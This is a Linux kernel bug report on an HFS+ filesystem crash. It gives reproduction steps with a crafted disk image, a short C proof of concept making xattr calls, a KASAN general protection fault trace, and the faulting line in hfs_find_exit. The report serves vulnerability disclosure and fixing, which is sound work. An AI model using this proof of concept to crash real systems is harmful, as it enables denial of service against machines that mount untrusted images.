Created attachment 276893 [details] The (compressed) crafted image which causes crash - Reproduce # mkdir mnt # mount -t hfsplus 6.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); listxattr(xattr, buf2, sizeof(buf2)); removexattr(xattr, "user.mime_type"); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 168.825163] general protection fault: 0000 [#1] SMP KASAN PTI [ 168.826445] CPU: 1 PID: 1440 Comm: a.out Not tainted 4.18.0-rc1+ #6 [ 168.827725] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 168.829734] RIP: 0010:__asan_load8+0x72/0x90 [ 168.830608] Code: 31 d2 be 08 00 00 00 e8 0c 17 00 00 5d c3 49 89 f8 48 be 00 00 00 00 00 fc ff df 49 c1 e8 03 41 80 3c 30 00 75 da 48 c1 e8 03 <0f> b6 04 30 84 c0 74 c3 38 d0 0f 9e c0 eb c3 0f 1f 44 00 00 66 2e [ 168.834454] RSP: 0018:ffff8801f0a17648 EFLAGS: 00010246 [ 168.835515] RAX: 0000000000000000 RBX: 0000000000000043 RCX: ffffffffad5b479c [ 168.836958] RDX: 0000000000000002 RSI: dffffc0000000000 RDI: fffffffffffffffb [ 168.838390] RBP: ffff8801f0a17648 R08: 1fffffffffffffff R09: ffffed003c384baa [ 168.839821] R10: 0000000000000001 R11: ffffed003c384ba9 R12: fffffffffffffffb [ 168.841264] R13: ffff8801ddab8908 R14: ffff8801df7b0000 R15: 00000000fffffffb [ 168.842697] FS: 00007fba2738c700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 168.844313] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 168.845486] CR2: 00000000019ef008 CR3: 00000001ef964000 CR4: 00000000000006e0 [ 168.846930] Call Trace: [ 168.847476] hfsplus_bnode_put+0x2c/0x190 [ 168.848311] hfsplus_find_exit+0x25/0x60 [ 168.849130] hfsplus_create_attr+0x1a5/0x2b0 [ 168.850007] ? hfsplus_attr_exists+0x140/0x140 [ 168.850915] ? hfsplus_find_init+0x54/0xc0 [ 168.851789] ? strncmp+0x3d/0xc0 [ 168.852470] __hfsplus_setxattr+0x2d5/0x1160 [ 168.853376] ? unwind_get_return_address+0x36/0x50 [ 168.854351] ? kasan_check_write+0x14/0x20 [ 168.855208] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 168.856133] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 168.857324] ? save_stack+0x46/0xd0 [ 168.858045] ? kasan_kmalloc+0xad/0xe0 [ 168.858815] ? kmem_cache_alloc_trace+0x102/0x200 [ 168.859777] ? hfsplus_setxattr+0x4c/0xb0 [ 168.860608] ? hfsplus_user_setxattr+0x27/0x30 [ 168.861519] ? __vfs_setxattr+0x7c/0xa0 [ 168.862307] ? __vfs_setxattr_noperm+0x8d/0x200 [ 168.863225] ? vfs_setxattr+0xb3/0xc0 [ 168.863975] ? setxattr+0x1b3/0x260 [ 168.864702] ? path_setxattr+0x134/0x170 [ 168.865502] ? __x64_sys_setxattr+0x6d/0x80 [ 168.866365] ? do_syscall_64+0x78/0x170 [ 168.867152] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 168.868204] ? save_stack+0xb5/0xd0 [ 168.870339] ? save_stack+0x46/0xd0 [ 168.871064] ? kasan_kmalloc+0xad/0xe0 [ 168.871842] ? __kmalloc_node+0x11e/0x2e0 [ 168.872701] ? kvmalloc_node+0x31/0x80 [ 168.873476] ? setxattr+0x114/0x260 [ 168.874197] ? path_setxattr+0x134/0x170 [ 168.875004] ? __x64_sys_setxattr+0x6d/0x80 [ 168.875865] ? do_syscall_64+0x78/0x170 [ 168.876669] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 168.877737] ? save_stack+0xb5/0xd0 [ 168.878463] ? save_stack+0x46/0xd0 [ 168.879189] ? __kasan_slab_free+0x13c/0x1a0 [ 168.880070] ? kasan_slab_free+0xe/0x10 [ 168.880876] ? kmem_cache_free+0x89/0x1e0 [ 168.881711] ? putname+0x80/0x90 [ 168.882380] ? filename_lookup+0x191/0x280 [ 168.883225] ? kasan_unpoison_shadow+0x36/0x50 [ 168.884140] ? kasan_kmalloc+0xad/0xe0 [ 168.884926] ? kmem_cache_alloc_trace+0x102/0x200 [ 168.885893] hfsplus_setxattr+0x8a/0xb0 [ 168.886688] hfsplus_user_setxattr+0x27/0x30 [ 168.887569] __vfs_setxattr+0x7c/0xa0 [ 168.888331] __vfs_setxattr_noperm+0x8d/0x200 [ 168.889240] vfs_setxattr+0xb3/0xc0 [ 168.889968] setxattr+0x1b3/0x260 [ 168.890660] ? vfs_setxattr+0xc0/0xc0 [ 168.891418] ? filename_lookup+0x191/0x280 [ 168.892262] ? filename_parentat+0x2b0/0x2b0 [ 168.893149] ? kasan_kmalloc+0xad/0xe0 [ 168.893929] ? kasan_check_write+0x14/0x20 [ 168.894800] ? strncpy_from_user+0xa8/0x1c0 [ 168.895670] ? __mnt_is_readonly.part.13+0x23/0x30 [ 168.896664] ? __mnt_want_write+0x9d/0xb0 [ 168.897496] path_setxattr+0x134/0x170 [ 168.898274] ? setxattr+0x260/0x260 [ 168.899009] ? vm_brk+0x20/0x20 [ 168.899663] __x64_sys_setxattr+0x6d/0x80 [ 168.900508] do_syscall_64+0x78/0x170 [ 168.901273] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 168.902326] RIP: 0033:0x7fba26ead1fa [ 168.903060] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 168.906869] RSP: 002b:00007ffff2eb6888 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 168.908388] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fba26ead1fa [ 168.909819] RDX: 00007ffff2eb68b0 RSI: 00000000004008a4 RDI: 00000000019ef080 [ 168.911249] RBP: 00007ffff2eb6930 R08: 0000000000000001 R09: 0000000000000000 [ 168.912686] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 168.914115] R13: 00007ffff2eb6a30 R14: 0000000000000000 R15: 0000000000000000 [ 168.915548] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 168.925399] ---[ end trace 7f5a46c7478f1295 ]--- [ 168.926401] RIP: 0010:__asan_load8+0x72/0x90 [ 168.927281] Code: 31 d2 be 08 00 00 00 e8 0c 17 00 00 5d c3 49 89 f8 48 be 00 00 00 00 00 fc ff df 49 c1 e8 03 41 80 3c 30 00 75 da 48 c1 e8 03 <0f> b6 04 30 84 c0 74 c3 38 d0 0f 9e c0 eb c3 0f 1f 44 00 00 66 2e [ 168.931166] RSP: 0018:ffff8801f0a17648 EFLAGS: 00010246 [ 168.932609] RAX: 0000000000000000 RBX: 0000000000000043 RCX: ffffffffad5b479c [ 168.934131] RDX: 0000000000000002 RSI: dffffc0000000000 RDI: fffffffffffffffb [ 168.935610] RBP: ffff8801f0a17648 R08: 1fffffffffffffff R09: ffffed003c384baa [ 168.937092] R10: 0000000000000001 R11: ffffed003c384ba9 R12: fffffffffffffffb [ 168.938529] R13: ffff8801ddab8908 R14: ffff8801df7b0000 R15: 00000000fffffffb [ 168.939958] FS: 00007fba2738c700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 168.941630] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 168.942796] CR2: 00000000019ef008 CR3: 00000001ef964000 CR4: 00000000000006e0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bfind.c#L46 void hfs_find_exit(struct hfs_find_data *fd) { hfs_bnode_put(fd->bnode); <-- kfree(fd->search_key); hfs_dbg(BNODE_REFS, "find_exit: %d (%p)\n", fd->tree->cnid, __builtin_return_address(0)); mutex_unlock(&fd->tree->tree_lock); fd->tree = NULL; } Here an invalid pointer (fd->bnode) is passed into hfsplus_bnode_put() which later leads to kernel panic. Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.